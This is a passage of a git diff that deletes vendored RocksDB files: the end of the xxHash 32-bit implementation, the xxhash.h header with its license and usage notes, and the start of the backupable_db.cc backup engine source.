-            state->v3 += XXH_readLE32(p32, endian) * PRIME32_2; state->v3 = XXH_rotl32(state->v3, 13); state->v3 *= PRIME32_1; p32++;
-            state->v4 += XXH_readLE32(p32, endian) * PRIME32_2; state->v4 = XXH_rotl32(state->v4, 13); state->v4 *= PRIME32_1; p32++;
-        }
-        p += 16-state->memsize;
-        state->memsize = 0;
-    }
-
-    if (p <= bEnd-16)
-    {
-        const BYTE* const limit = bEnd - 16;
-        U32 v1 = state->v1;
-        U32 v2 = state->v2;
-        U32 v3 = state->v3;
-        U32 v4 = state->v4;
-
-        do
-        {
-            v1 += XXH_readLE32((const U32*)p, endian) * PRIME32_2; v1 = XXH_rotl32(v1, 13); v1 *= PRIME32_1; p+=4;
-            v2 += XXH_readLE32((const U32*)p, endian) * PRIME32_2; v2 = XXH_rotl32(v2, 13); v2 *= PRIME32_1; p+=4;
-            v3 += XXH_readLE32((const U32*)p, endian) * PRIME32_2; v3 = XXH_rotl32(v3, 13); v3 *= PRIME32_1; p+=4;
-            v4 += XXH_readLE32((const U32*)p, endian) * PRIME32_2; v4 = XXH_rotl32(v4, 13); v4 *= PRIME32_1; p+=4;
-        } while (p<=limit);
-
-        state->v1 = v1;
-        state->v2 = v2;
-        state->v3 = v3;
-        state->v4 = v4;
-    }
-
-    if (p < bEnd)
-    {
-        XXH_memcpy(state->memory, p, bEnd-p);
-        state->memsize = (int)(bEnd-p);
-    }
-
-    return XXH_OK;
-}
-
-XXH_errorcode XXH32_update (void* state_in, const void* input, int len)
-{
-    XXH_endianess endian_detected = (XXH_endianess)XXH_CPU_LITTLE_ENDIAN;
-
-    if ((endian_detected==XXH_littleEndian) || XXH_FORCE_NATIVE_FORMAT)
-        return XXH32_update_endian(state_in, input, len, XXH_littleEndian);
-    else
-        return XXH32_update_endian(state_in, input, len, XXH_bigEndian);
-}
-
-
-
-FORCE_INLINE U32 XXH32_intermediateDigest_endian (void* state_in, XXH_endianess endian)
-{
-    struct XXH_state32_t * state = (struct XXH_state32_t *) state_in;
-    const BYTE * p = (const BYTE*)state->memory;
-    BYTE* bEnd = (BYTE*)state->memory + state->memsize;
-    U32 h32;
-
-    if (state->total_len >= 16)
-    {
-        h32 = XXH_rotl32(state->v1, 1) + XXH_rotl32(state->v2, 7) + XXH_rotl32(state->v3, 12) + XXH_rotl32(state->v4, 18);
-    }
-    else
-    {
-        h32  = state->seed + PRIME32_5;
-    }
-
-    h32 += (U32) state->total_len;
-
-    while (p<=bEnd-4)
-    {
-        h32 += XXH_readLE32((const U32*)p, endian) * PRIME32_3;
-        h32  = XXH_rotl32(h32, 17) * PRIME32_4;
-        p+=4;
-    }
-
-    while (p<bEnd)
-    {
-        h32 += (*p) * PRIME32_5;
-        h32 = XXH_rotl32(h32, 11) * PRIME32_1;
-        p++;
-    }
-
-    h32 ^= h32 >> 15;
-    h32 *= PRIME32_2;
-    h32 ^= h32 >> 13;
-    h32 *= PRIME32_3;
-    h32 ^= h32 >> 16;
-
-    return h32;
-}
-
-
-U32 XXH32_intermediateDigest (void* state_in)
-{
-    XXH_endianess endian_detected = (XXH_endianess)XXH_CPU_LITTLE_ENDIAN;
-
-    if ((endian_detected==XXH_littleEndian) || XXH_FORCE_NATIVE_FORMAT)
-        return XXH32_intermediateDigest_endian(state_in, XXH_littleEndian);
-    else
-        return XXH32_intermediateDigest_endian(state_in, XXH_bigEndian);
-}
-
-
-U32 XXH32_digest (void* state_in)
-{
-    U32 h32 = XXH32_intermediateDigest(state_in);
-
-    XXH_free(state_in);
-
-    return h32;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/xxhash.h b/thirdparty/rocksdb/util/xxhash.h
deleted file mode 100644
index 3343e34..0000000
--- a/thirdparty/rocksdb/util/xxhash.h
+++ /dev/null
@@ -1,164 +0,0 @@
-/*
-   xxHash - Fast Hash algorithm
-   Header File
-   Copyright (C) 2012-2014, Yann Collet.
-   BSD 2-Clause License (http://www.opensource.org/licenses/bsd-license.php)
-
-   Redistribution and use in source and binary forms, with or without
-   modification, are permitted provided that the following conditions are
-   met:
-
-       * Redistributions of source code must retain the above copyright
-   notice, this list of conditions and the following disclaimer.
-       * Redistributions in binary form must reproduce the above
-   copyright notice, this list of conditions and the following disclaimer
-   in the documentation and/or other materials provided with the
-   distribution.
-
-   THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-   "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-   LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-   A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-   OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-   SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-   LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-   DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-   THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-   (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-   OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-
-   You can contact the author at :
-   - xxHash source repository : http://code.google.com/p/xxhash/
-*/
-
-/* Notice extracted from xxHash homepage :
-
-xxHash is an extremely fast Hash algorithm, running at RAM speed limits.
-It also successfully passes all tests from the SMHasher suite.
-
-Comparison (single thread, Windows Seven 32 bits, using SMHasher on a Core 2 Duo @3GHz)
-
-Name            Speed       Q.Score   Author
-xxHash          5.4 GB/s     10
-CrapWow         3.2 GB/s      2       Andrew
-MumurHash 3a    2.7 GB/s     10       Austin Appleby
-SpookyHash      2.0 GB/s     10       Bob Jenkins
-SBox            1.4 GB/s      9       Bret Mulvey
-Lookup3         1.2 GB/s      9       Bob Jenkins
-SuperFastHash   1.2 GB/s      1       Paul Hsieh
-CityHash64      1.05 GB/s    10       Pike & Alakuijala
-FNV             0.55 GB/s     5       Fowler, Noll, Vo
-CRC32           0.43 GB/s     9
-MD5-32          0.33 GB/s    10       Ronald L. Rivest
-SHA1-32         0.28 GB/s    10
-
-Q.Score is a measure of quality of the hash function.
-It depends on successfully passing SMHasher test set.
-10 is a perfect score.
-*/
-
-#pragma once
-
-#if defined (__cplusplus)
-namespace rocksdb {
-#endif
-
-
-//****************************
-// Type
-//****************************
-typedef enum { XXH_OK=0, XXH_ERROR } XXH_errorcode;
-
-
-
-//****************************
-// Simple Hash Functions
-//****************************
-
-unsigned int XXH32 (const void* input, int len, unsigned int seed);
-
-/*
-XXH32() :
-    Calculate the 32-bits hash of sequence of length "len" stored at memory address "input".
-    The memory between input & input+len must be valid (allocated and read-accessible).
-    "seed" can be used to alter the result predictably.
-    This function successfully passes all SMHasher tests.
-    Speed on Core 2 Duo @ 3 GHz (single thread, SMHasher benchmark) : 5.4 GB/s
-    Note that "len" is type "int", which means it is limited to 2^31-1.
-    If your data is larger, use the advanced functions below.
-*/
-
-
-
-//****************************
-// Advanced Hash Functions
-//****************************
-
-void*         XXH32_init   (unsigned int seed);
-XXH_errorcode XXH32_update (void* state, const void* input, int len);
-unsigned int  XXH32_digest (void* state);
-
-/*
-These functions calculate the xxhash of an input provided in several small packets,
-as opposed to an input provided as a single block.
-
-It must be started with :
-void* XXH32_init()
-The function returns a pointer which holds the state of calculation.
-
-This pointer must be provided as "void* state" parameter for XXH32_update().
-XXH32_update() can be called as many times as necessary.
-The user must provide a valid (allocated) input.
-The function returns an error code, with 0 meaning OK, and any other value meaning there is an error.
-Note that "len" is type "int", which means it is limited to 2^31-1.
-If your data is larger, it is recommended to chunk your data into blocks
-of size for example 2^30 (1GB) to avoid any "int" overflow issue.
-
-Finally, you can end the calculation anytime, by using XXH32_digest().
-This function returns the final 32-bits hash.
-You must provide the same "void* state" parameter created by XXH32_init().
-Memory will be freed by XXH32_digest().
-*/
-
-
-int           XXH32_sizeofState();
-XXH_errorcode XXH32_resetState(void* state, unsigned int seed);
-
-#define       XXH32_SIZEOFSTATE 48
-typedef struct { long long ll[(XXH32_SIZEOFSTATE+(sizeof(long long)-1))/sizeof(long long)]; } XXH32_stateSpace_t;
-/*
-These functions allow user application to make its own allocation for state.
-
-XXH32_sizeofState() is used to know how much space must be allocated for the xxHash 32-bits state.
-Note that the state must be aligned to access 'long long' fields. Memory must be allocated and referenced by a pointer.
-This pointer must then be provided as 'state' into XXH32_resetState(), which initializes the state.
-
-For static allocation purposes (such as allocation on stack, or freestanding systems without malloc()),
-use the structure XXH32_stateSpace_t, which will ensure that memory space is large enough and correctly aligned to access 'long long' fields.
-*/
-
-
-unsigned int XXH32_intermediateDigest (void* state);
-/*
-This function does the same as XXH32_digest(), generating a 32-bit hash,
-but preserve memory context.
-This way, it becomes possible to generate intermediate hashes, and then continue feeding data with XXH32_update().
-To free memory context, use XXH32_digest(), or free().
-*/
-
-
-
-//****************************
-// Deprecated function names
-//****************************
-// The following translations are provided to ease code transition
-// You are encouraged to no longer this function names
-#define XXH32_feed   XXH32_update
-#define XXH32_result XXH32_digest
-#define XXH32_getIntermediateResult XXH32_intermediateDigest
-
-
-
-#if defined (__cplusplus)
-}  // namespace rocksdb
-#endif
diff --git a/thirdparty/rocksdb/utilities/backupable/backupable_db.cc b/thirdparty/rocksdb/utilities/backupable/backupable_db.cc
deleted file mode 100644
index 8921309..0000000
--- a/thirdparty/rocksdb/utilities/backupable/backupable_db.cc
+++ /dev/null
@@ -1,1789 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/utilities/backupable_db.h"
-#include "port/port.h"
-#include "rocksdb/rate_limiter.h"
-#include "rocksdb/transaction_log.h"
-#include "util/channel.h"
-#include "util/coding.h"
-#include "util/crc32c.h"
-#include "util/file_reader_writer.h"
-#include "util/filename.h"
-#include "util/logging.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-#include "utilities/checkpoint/checkpoint_impl.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif  // __STDC_FORMAT_MACROS
-
-#include <inttypes.h>
-#include <stdlib.h>
-#include <algorithm>
-#include <atomic>
-#include <functional>
-#include <future>
-#include <limits>
-#include <map>
-#include <mutex>
-#include <sstream>
-#include <string>
-#include <thread>
-#include <unordered_map>
-#include <unordered_set>
-#include <vector>
-
-namespace rocksdb {
-
-void BackupStatistics::IncrementNumberSuccessBackup() {
-  number_success_backup++;
-}
-void BackupStatistics::IncrementNumberFailBackup() {
-  number_fail_backup++;
-}
-
-uint32_t BackupStatistics::GetNumberSuccessBackup() const {
-  return number_success_backup;
-}
-uint32_t BackupStatistics::GetNumberFailBackup() const {
-  return number_fail_backup;
-}
-
-std::string BackupStatistics::ToString() const {
-  char result[50];
-  snprintf(result, sizeof(result), "# success backup: %u, # fail backup: %u",
-           GetNumberSuccessBackup(), GetNumberFailBackup());
-  return result;
-}
-
-void BackupableDBOptions::Dump(Logger* logger) const {
-  ROCKS_LOG_INFO(logger, "               Options.backup_dir: %s",
-                 backup_dir.c_str());
-  ROCKS_LOG_INFO(logger, "               Options.backup_env: %p", backup_env);
-  ROCKS_LOG_INFO(logger, "        Options.share_table_files: %d",
-                 static_cast<int>(share_table_files));
-  ROCKS_LOG_INFO(logger, "                 Options.info_log: %p", info_log);
-  ROCKS_LOG_INFO(logger, "                     Options.sync: %d",
-                 static_cast<int>(sync));
-  ROCKS_LOG_INFO(logger, "         Options.destroy_old_data: %d",
-                 static_cast<int>(destroy_old_data));
-  ROCKS_LOG_INFO(logger, "         Options.backup_log_files: %d",
-                 static_cast<int>(backup_log_files));
-  ROCKS_LOG_INFO(logger, "        Options.backup_rate_limit: %" PRIu64,
-                 backup_rate_limit);
-  ROCKS_LOG_INFO(logger, "       Options.restore_rate_limit: %" PRIu64,
-                 restore_rate_limit);
-  ROCKS_LOG_INFO(logger, "Options.max_background_operations: %d",
-                 max_background_operations);
-}
-
-// -------- BackupEngineImpl class ---------
-class BackupEngineImpl : public BackupEngine {
- public:
-  BackupEngineImpl(Env* db_env, const BackupableDBOptions& options,
-                   bool read_only = false);
-  ~BackupEngineImpl();
-  Status CreateNewBackupWithMetadata(DB* db, const std::string& app_metadata,
-                                     bool flush_before_backup = false,
-                                     std::function<void()> progress_callback =
-                                         []() {}) override;
-  Status PurgeOldBackups(uint32_t num_backups_to_keep) override;
-  Status DeleteBackup(BackupID backup_id) override;
-  void StopBackup() override {
-    stop_backup_.store(true, std::memory_order_release);
-  }
-  Status GarbageCollect() override;
-
-  // The returned BackupInfos are in chronological order, which means the
-  // latest backup comes last.
-  void GetBackupInfo(std::vector<BackupInfo>* backup_info) override;
-  void GetCorruptedBackups(std::vector<BackupID>* corrupt_backup_ids) override;
-  Status RestoreDBFromBackup(
-      BackupID backup_id, const std::string& db_dir, const std::string& wal_dir,
-      const RestoreOptions& restore_options = RestoreOptions()) override;
-  Status RestoreDBFromLatestBackup(
-      const std::string& db_dir, const std::string& wal_dir,
-      const RestoreOptions& restore_options = RestoreOptions()) override {
-    return RestoreDBFromBackup(latest_backup_id_, db_dir, wal_dir,
-                               restore_options);
-  }
-
-  virtual Status VerifyBackup(BackupID backup_id) override;
-
-  Status Initialize();
-
- private:
-  void DeleteChildren(const std::string& dir, uint32_t file_type_filter = 0);
-
-  // Extends the "result" map with pathname->size mappings for the contents of
-  // "dir" in "env". Pathnames are prefixed with "dir".
-  Status InsertPathnameToSizeBytes(
-      const std::string& dir, Env* env,
-      std::unordered_map<std::string, uint64_t>* result);
-
-  struct FileInfo {
-    FileInfo(const std::string& fname, uint64_t sz, uint32_t checksum)
-      : refs(0), filename(fname), size(sz), checksum_value(checksum) {}
-
-    FileInfo(const FileInfo&) = delete;
-    FileInfo& operator=(const FileInfo&) = delete;
-
-    int refs;
-    const std::string filename;
-    const uint64_t size;
-    const uint32_t checksum_value;
-  };
-
-  class BackupMeta {
-   public:
-    BackupMeta(const std::string& meta_filename,
-        std::unordered_map<std::string, std::shared_ptr<FileInfo>>* file_infos,
-        Env* env)
-      : timestamp_(0), size_(0), meta_filename_(meta_filename),
-        file_infos_(file_infos), env_(env) {}
-
-    BackupMeta(const BackupMeta&) = delete;
-    BackupMeta& operator=(const BackupMeta&) = delete;
-
-    ~BackupMeta() {}
-
-    void RecordTimestamp() {
-      env_->GetCurrentTime(&timestamp_);
-    }
-    int64_t GetTimestamp() const {
-      return timestamp_;
-    }
-    uint64_t GetSize() const {
-      return size_;
-    }
-    uint32_t GetNumberFiles() { return static_cast<uint32_t>(files_.size()); }
-    void SetSequenceNumber(uint64_t sequence_number) {
-      sequence_number_ = sequence_number;
-    }
-    uint64_t GetSequenceNumber() {
-      return sequence_number_;
-    }
-
-    const std::string& GetAppMetadata() const { return app_metadata_; }
-
-    void SetAppMetadata(const std::string& app_metadata) {
-      app_metadata_ = app_metadata;
-    }
-
-    Status AddFile(std::shared_ptr<FileInfo> file_info);
-
-    Status Delete(bool delete_meta = true);
-
-    bool Empty() {
-      return files_.empty();
-    }
-
-    std::shared_ptr<FileInfo> GetFile(const std::string& filename) const {
-      auto it = file_infos_->find(filename);
-      if (it == file_infos_->end())
-        return nullptr;
-      return it->second;
-    }
-
-    const std::vector<std::shared_ptr<FileInfo>>& GetFiles() {
-      return files_;
-    }
-
-    // @param abs_path_to_size Pre-fetched file sizes (bytes).
-    Status LoadFromFile(
-        const std::string& backup_dir,
-        const std::unordered_map<std::string, uint64_t>& abs_path_to_size);
-    Status StoreToFile(bool sync);
-
-    std::string GetInfoString() {
-      std::ostringstream ss;
-      ss << "Timestamp: " << timestamp_ << std::endl;
-      char human_size[16];
-      AppendHumanBytes(size_, human_size, sizeof(human_size));
-      ss << "Size: " << human_size << std::endl;
-      ss << "Files:" << std::endl;
-      for (const auto& file : files_) {
-        AppendHumanBytes(file->size, human_size, sizeof(human_size));
-        ss << file->filename << ", size " << human_size << ", refs "
-           << file->refs << std::endl;
-      }
-      return ss.str();
-    }
-
-   private:
-    int64_t timestamp_;
-    // sequence number is only approximate, should not be used
-    // by clients
-    uint64_t sequence_number_;
-    uint64_t size_;
-    std::string app_metadata_;
-    std::string const meta_filename_;
-    // files with relative paths (without "/" prefix!!)
-    std::vector<std::shared_ptr<FileInfo>> files_;
-    std::unordered_map<std::string, std::shared_ptr<FileInfo>>* file_infos_;
-    Env* env_;
-
-    static const size_t max_backup_meta_file_size_ = 10 * 1024 * 1024;  // 10MB
-  };  // BackupMeta
-
-  inline std::string GetAbsolutePath(
-      const std::string &relative_path = "") const {
-    assert(relative_path.size() == 0 || relative_path[0] != '/');
-    return options_.backup_dir + "/" + relative_path;
-  }
-  inline std::string GetPrivateDirRel() const {
-    return "private";
-  }
-  inline std::string GetSharedChecksumDirRel() const {
-    return "shared_checksum";
-  }
-  inline std::string GetPrivateFileRel(BackupID backup_id,
-                                       bool tmp = false,
-                                       const std::string& file = "") const {
-    assert(file.size() == 0 || file[0] != '/');
-    return GetPrivateDirRel() + "/" + rocksdb::ToString(backup_id) +
-           (tmp ? ".tmp" : "") + "/" + file;
-  }
-  inline std::string GetSharedFileRel(const std::string& file = "",
-                                      bool tmp = false) const {
-    assert(file.size() == 0 || file[0] != '/');
-    return "shared/" + file + (tmp ? ".tmp" : "");
-  }
-  inline std::string GetSharedFileWithChecksumRel(const std::string& file = "",
-                                                  bool tmp = false) const {
-    assert(file.size() == 0 || file[0] != '/');
-    return GetSharedChecksumDirRel() + "/" + file + (tmp ? ".tmp" : "");
-  }
-  inline std::string GetSharedFileWithChecksum(const std::string& file,
-                                               const uint32_t checksum_value,
-                                               const uint64_t file_size) const {
-    assert(file.size() == 0 || file[0] != '/');
-    std::string file_copy = file;
-    return file_copy.insert(file_copy.find_last_of('.'),
-                            "_" + rocksdb::ToString(checksum_value) + "_" +
-                                rocksdb::ToString(file_size));
-  }
-  inline std::string GetFileFromChecksumFile(const std::string& file) const {
-    assert(file.size() == 0 || file[0] != '/');
-    std::string file_copy = file;
-    size_t first_underscore = file_copy.find_first_of('_');
-    return file_copy.erase(first_underscore,
-                           file_copy.find_last_of('.') - first_underscore);
-  }
-  inline std::string GetBackupMetaDir() const {
-    return GetAbsolutePath("meta");
-  }
-  inline std::string GetBackupMetaFile(BackupID backup_id) const {
-    return GetBackupMetaDir() + "/" + rocksdb::ToString(backup_id);
-  }
-
-  // If size_limit == 0, there is no size limit, copy everything.
-  //
-  // Exactly one of src and contents must be non-empty.
-  //
-  // @param src If non-empty, the file is copied from this pathname.
-  // @param contents If non-empty, the file will be created with these contents.
-  Status CopyOrCreateFile(const std::string& src, const std::string& dst,
-                          const std::string& contents, Env* src_env,
-                          Env* dst_env, bool sync, RateLimiter* rate_limiter,
-                          uint64_t* size = nullptr,
-                          uint32_t* checksum_value = nullptr,
-                          uint64_t size_limit = 0,
-                          std::function<void()> progress_callback = []() {});
-
-  Status CalculateChecksum(const std::string& src,
-                           Env* src_env,
-                           uint64_t size_limit,
-                           uint32_t* checksum_value);
-
-  struct CopyOrCreateResult {
-    uint64_t size;
-    uint32_t checksum_value;
-    Status status;
-  };
-
-  // Exactly one of src_path and contents must be non-empty. If src_path is
-  // non-empty, the file is copied from this pathname. Otherwise, if contents is
-  // non-empty, the file will be created at dst_path with these contents.
-  struct CopyOrCreateWorkItem {
-    std::string src_path;
-    std::string dst_path;
-    std::string contents;
-    Env* src_env;
-    Env* dst_env;
-    bool sync;
-    RateLimiter* rate_limiter;
-    uint64_t size_limit;
-    std::promise<CopyOrCreateResult> result;
-    std::function<void()> progress_callback;
-
-    CopyOrCreateWorkItem() {}
-    CopyOrCreateWorkItem(const CopyOrCreateWorkItem&) = delete;
-    CopyOrCreateWorkItem& operator=(const CopyOrCreateWorkItem&) = delete;
-
-    CopyOrCreateWorkItem(CopyOrCreateWorkItem&& o) ROCKSDB_NOEXCEPT {
-      *this = std::move(o);
-    }
-
-    CopyOrCreateWorkItem& operator=(CopyOrCreateWorkItem&& o) ROCKSDB_NOEXCEPT {
-      src_path = std::move(o.src_path);
-      dst_path = std::move(o.dst_path);
-      contents = std::move(o.contents);
-      src_env = o.src_env;
-      dst_env = o.dst_env;
-      sync = o.sync;
-      rate_limiter = o.rate_limiter;
-      size_limit = o.size_limit;
-      result = std::move(o.result);
-      progress_callback = std::move(o.progress_callback);
-      return *this;
-    }
-
-    CopyOrCreateWorkItem(std::string _src_path, std::string _dst_path,
-                         std::string _contents, Env* _src_env, Env* _dst_env,
-                         bool _sync, RateLimiter* _rate_limiter,
-                         uint64_t _size_limit,
-                         std::function<void()> _progress_callback = []() {})
-        : src_path(std::move(_src_path)),
-          dst_path(std::move(_dst_path)),
-          contents(std::move(_contents)),
-          src_env(_src_env),
-          dst_env(_dst_env),
-          sync(_sync),
-          rate_limiter(_rate_limiter),
-          size_limit(_size_limit),
-          progress_callback(_progress_callback) {}
-  };
-
-  struct BackupAfterCopyOrCreateWorkItem {
-    std::future<CopyOrCreateResult> result;
-    bool shared;
-    bool needed_to_copy;
-    Env* backup_env;
-    std::string dst_path_tmp;
-    std::string dst_path;
-    std::string dst_relative;
-    BackupAfterCopyOrCreateWorkItem() {}
-
-    BackupAfterCopyOrCreateWorkItem(BackupAfterCopyOrCreateWorkItem&& o)
-        ROCKSDB_NOEXCEPT {
-      *this = std::move(o);
-    }
-
-    BackupAfterCopyOrCreateWorkItem& operator=(
-        BackupAfterCopyOrCreateWorkItem&& o) ROCKSDB_NOEXCEPT {
-      result = std::move(o.result);
-      shared = o.shared;
-      needed_to_copy = o.needed_to_copy;
-      backup_env = o.backup_env;
-      dst_path_tmp = std::move(o.dst_path_tmp);
-      dst_path = std::move(o.dst_path);
-      dst_relative = std::move(o.dst_relative);
-      return *this;
-    }
-
-    BackupAfterCopyOrCreateWorkItem(std::future<CopyOrCreateResult>&& _result,
-                                    bool _shared, bool _needed_to_copy,
-                                    Env* _backup_env, std::string _dst_path_tmp,
-                                    std::string _dst_path,
-                                    std::string _dst_relative)
-        : result(std::move(_result)),
-          shared(_shared),
-          needed_to_copy(_needed_to_copy),
-          backup_env(_backup_env),
-          dst_path_tmp(std::move(_dst_path_tmp)),
-          dst_path(std::move(_dst_path)),
-          dst_relative(std::move(_dst_relative)) {}
-  };
-
-  struct RestoreAfterCopyOrCreateWorkItem {
-    std::future<CopyOrCreateResult> result;
-    uint32_t checksum_value;
-    RestoreAfterCopyOrCreateWorkItem() {}
-    RestoreAfterCopyOrCreateWorkItem(std::future<CopyOrCreateResult>&& _result,
-                                     uint32_t _checksum_value)
-        : result(std::move(_result)), checksum_value(_checksum_value) {}
-    RestoreAfterCopyOrCreateWorkItem(RestoreAfterCopyOrCreateWorkItem&& o)
-        ROCKSDB_NOEXCEPT {
-      *this = std::move(o);
-    }
-
-    RestoreAfterCopyOrCreateWorkItem& operator=(
-        RestoreAfterCopyOrCreateWorkItem&& o) ROCKSDB_NOEXCEPT {
-      result = std::move(o.result);
-      checksum_value = o.checksum_value;
-      return *this;
-    }
-  };
-
-  bool initialized_;
-  std::mutex byte_report_mutex_;
-  channel<CopyOrCreateWorkItem> files_to_copy_or_create_;
-  std::vector<port::Thread> threads_;
-
-  // Adds a file to the backup work queue to be copied or created if it doesn't
-  // already exist.
-  //
-  // Exactly one of src_dir and contents must be non-empty.
-  //
-  // @param src_dir If non-empty, the file in this directory named fname will be
-  //    copied.
-  // @param fname Name of destination file and, in case of copy, source file.
-  // @param contents If non-empty, the file will be created with these contents.
-  Status AddBackupFileWorkItem(
-      std::unordered_set<std::string>& live_dst_paths,
-      std::vector<BackupAfterCopyOrCreateWorkItem>& backup_items_to_finish,
-      BackupID backup_id, bool shared, const std::string& src_dir,
-      const std::string& fname,  // starts with "/"
-      RateLimiter* rate_limiter, uint64_t size_bytes, uint64_t size_limit = 0,
-      bool shared_checksum = false,
-      std::function<void()> progress_callback = []() {},
-      const std::string& contents = std::string());
-
-  // backup state data
-  BackupID latest_backup_id_;
-  std::map<BackupID, unique_ptr<BackupMeta>> backups_;
-  std::map<BackupID,
-           std::pair<Status, unique_ptr<BackupMeta>>> corrupt_backups_;
-  std::unordered_map<std::string,
-                     std::shared_ptr<FileInfo>> backuped_file_infos_;
-  std::atomic<bool> stop_backup_;
-
-  // options data
-  BackupableDBOptions options_;
-  Env* db_env_;
-  Env* backup_env_;
-
-  // directories
-  unique_ptr<Directory> backup_directory_;
-  unique_ptr<Directory> shared_directory_;
-  unique_ptr<Directory> meta_directory_;
-  unique_ptr<Directory> private_directory_;
-
-  static const size_t kDefaultCopyFileBufferSize = 5 * 1024 * 1024LL;  // 5MB
-  size_t copy_file_buffer_size_;
-  bool read_only_;
-  BackupStatistics backup_statistics_;
-  static const size_t kMaxAppMetaSize = 1024 * 1024;  // 1MB
-};
-
-Status BackupEngine::Open(Env* env, const BackupableDBOptions& options,
-                          BackupEngine** backup_engine_ptr) {
-  std::unique_ptr<BackupEngineImpl> backup_engine(
-      new BackupEngineImpl(env, options));
-  auto s = backup_engine->Initialize();
-  if (!s.ok()) {
-    *backup_engine_ptr = nullptr;
-    return s;
-  }
-  *backup_engine_ptr = backup_engine.release();
-  return Status::OK();
-}
-
-BackupEngineImpl::BackupEngineImpl(Env* db_env,
-                                   const BackupableDBOptions& options,
-                                   bool read_only)
-    : initialized_(false),
-      stop_backup_(false),
-      options_(options),
-      db_env_(db_env),
-      backup_env_(options.backup_env != nullptr ? options.backup_env : db_env_),
-      copy_file_buffer_size_(kDefaultCopyFileBufferSize),
-      read_only_(read_only) {
-  if (options_.backup_rate_limiter == nullptr &&
-      options_.backup_rate_limit > 0) {
-    options_.backup_rate_limiter.reset(
-        NewGenericRateLimiter(options_.backup_rate_limit));
-  }
-  if (options_.restore_rate_limiter == nullptr &&
-      options_.restore_rate_limit > 0) {
-    options_.restore_rate_limiter.reset(
-        NewGenericRateLimiter(options_.restore_rate_limit));
-  }
-}
-
-BackupEngineImpl::~BackupEngineImpl() {
-  files_to_copy_or_create_.sendEof();
-  for (auto& t : threads_) {
-    t.join();
-  }
-  LogFlush(options_.info_log);
-}
-
-Status BackupEngineImpl::Initialize() {
-  assert(!initialized_);
-  initialized_ = true;
-  if (read_only_) {
-    ROCKS_LOG_INFO(options_.info_log, "Starting read_only backup engine");
-  }
-  options_.Dump(options_.info_log);
-
-  if (!read_only_) {
-    // gather the list of directories that we need to create
-    std::vector<std::pair<std::string, std::unique_ptr<Directory>*>>
-        directories;
-    directories.emplace_back(GetAbsolutePath(), &backup_directory_);
-    if (options_.share_table_files) {
-      if (options_.share_files_with_checksum) {
-        directories.emplace_back(
-            GetAbsolutePath(GetSharedFileWithChecksumRel()),
-            &shared_directory_);
-      } else {
-        directories.emplace_back(GetAbsolutePath(GetSharedFileRel()),
-                                 &shared_directory_);
-      }
-    }
-    directories.emplace_back(GetAbsolutePath(GetPrivateDirRel()),
-                             &private_directory_);
-    directories.emplace_back(GetBackupMetaDir(), &meta_directory_);
-    // create all the dirs we need
-    for (const auto& d : directories) {
-      auto s = backup_env_->CreateDirIfMissing(d.first);
-      if (s.ok()) {
-        s = backup_env_->NewDirectory(d.first, d.second);
-      }
-      if (!s.ok()) {
-        return s;
-      }
-    }
-  }
-
-  std::vector<std::string> backup_meta_files;
-  {
-    auto s = backup_env_->GetChildren(GetBackupMetaDir(), &backup_meta_files);
-    if (s.IsNotFound()) {
-      return Status::NotFound(GetBackupMetaDir() + " is missing");
-    } else if (!s.ok()) {
-      return s;
-    }
-  }
-  // create backups_ structure
-  for (auto& file : backup_meta_files) {
-    if (file == "." || file == "..") {
-      continue;
-    }
-    ROCKS_LOG_INFO(options_.info_log, "Detected backup %s", file.c_str());
-    BackupID backup_id = 0;
-    sscanf(file.c_str(), "%u", &backup_id);
-    if (backup_id == 0 || file != rocksdb::ToString(backup_id)) {
-      if (!read_only_) {
-        // invalid file name, delete that
-        auto s = backup_env_->DeleteFile(GetBackupMetaDir() + "/" + file);
-        ROCKS_LOG_INFO(options_.info_log,
-                       "Unrecognized meta file %s, deleting -- %s",
-                       file.c_str(), s.ToString().c_str());
-      }
-      continue;
-    }
-    assert(backups_.find(backup_id) == backups_.end());
-    backups_.insert(
-        std::make_pair(backup_id, unique_ptr<BackupMeta>(new BackupMeta(
-                                      GetBackupMetaFile(backup_id),
-                                      &backuped_file_infos_, backup_env_))));
-  }
-
-  latest_backup_id_ = 0;
-  if (options_.destroy_old_data) {  // Destroy old data
-    assert(!read_only_);
-    ROCKS_LOG_INFO(
-        options_.info_log,
-        "Backup Engine started with destroy_old_data == true, deleting all "
-        "backups");
-    auto s = PurgeOldBackups(0);
-    if (s.ok()) {
-      s = GarbageCollect();
-    }
-    if (!s.ok()) {
-      return s;
-    }
-  } else {  // Load data from storage
-    std::unordered_map<std::string, uint64_t> abs_path_to_size;
-    for (const auto& rel_dir :
-         {GetSharedFileRel(), GetSharedFileWithChecksumRel()}) {
-      const auto abs_dir = GetAbsolutePath(rel_dir);
-      InsertPathnameToSizeBytes(abs_dir, backup_env_, &abs_path_to_size);
-    }
-    // load the backups if any, until valid_backups_to_open of the latest
-    // non-corrupted backups have been successfully opened.
-    int valid_backups_to_open;
